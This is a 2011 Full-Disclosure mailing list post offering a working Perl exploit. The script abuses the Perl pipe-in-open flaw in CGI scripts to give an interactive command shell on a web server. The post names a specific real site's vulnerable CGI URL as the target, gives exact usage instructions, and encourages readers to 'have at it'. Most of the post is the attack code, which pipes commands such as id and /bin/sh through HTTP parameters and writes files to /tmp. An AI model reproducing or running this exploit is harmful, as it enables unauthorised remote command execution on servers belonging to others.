[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
- From: Marshall Whittaker <marshallwhittaker@xxxxxxxxx>
- Date: Sat, 15 Oct 2011 19:01:50 -0300
Well shit. It did send twice. :( Now I look like a goof, haha.
On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <
marshallwhittaker@xxxxxxxxx> wrote:
> This works off the perl pipe read bug, you can just input the first and
> second parts of the web address (with http:// included) and it'll drop you
> at a shell. When using cd you must use the absolute path because I was too
> lazy to do it the correct way. ;-). I know this is pretty easy stuff, it
> works off those vulns that can just be exploited with a web browser, but
> this gives you a shell. So have at it guys & gals! Had to resend because I
> got some message about my attachment being blocked. Not sure if it really
> was, though, I'll send again anyway. Hope this isn't spamming the list. =/
>
> Site:
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
> Useage: ./sublime.pl "
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=";
> "&desc=Stat+File"
>
> Should work on most perl cgi scripts that are vulnerable to | read bug.
> Please note, it's not a "real" shell, but almost everything works, except
> things that won't go in one instance like cd-ing and env vars, etc.
>
> Play nice!
>
> --oxagast
>
> [CODE]
>
> #!/usr/bin/perl
>
> # adaptive cgi shell by oxagast
>
> use LWP::Simple;
> $part1 = @ARGV[0]; $part2 = @ARGV[1];
> print "Making buffer...\n";
> for $bet (100..200) {
> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
> }
> print "Exploiting...\n";
> $id = get("$part1\|id\|$part2");
> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
> $uid = $1;
> print "$uid\n";
> while (0 == 0) {
> print "\$ ";
> $cmd = <STDIN>;
> chomp($cmd);
> if ($cmd =~ m/cd (\/.*)/) {
> $dir = $1;
> }
> if ($cmd eq "cd ..") {
> $dir =~ s/(.*)\/.*/\/\1/;
> }
> if ($cmd eq "pwd") {
> $dirjunk = $dir;
> if ($dirjunk eq "//") {
> $dirjunk = "/";
> }
> }
> $dirjunk = "cd $dir\;$cmd";
> $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
> $cmdhex =~ s/(..)/\\\\x$1/g;
> get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
> @backjunk = split("\n", $backjunk2);
> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
> get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
> @backjunk_split = split("\n", $backjunk_as);
> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
> $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
> $thismanylines = $1 - 1;
> for $junknum (0..scalar(@backjunk_split)) {
> for $fuzz (10..100+$thismanylines) {
> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
> $middle = $1;
> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
> @backjunk_split[$junknum] =~ s/$1//;
> @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
> @backjunk_split[$junknum] =~ s/$1//;
> print "$backjunk_split[$junknum]\n";
> }
> }
> }
> }
>
> [/CODE]
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/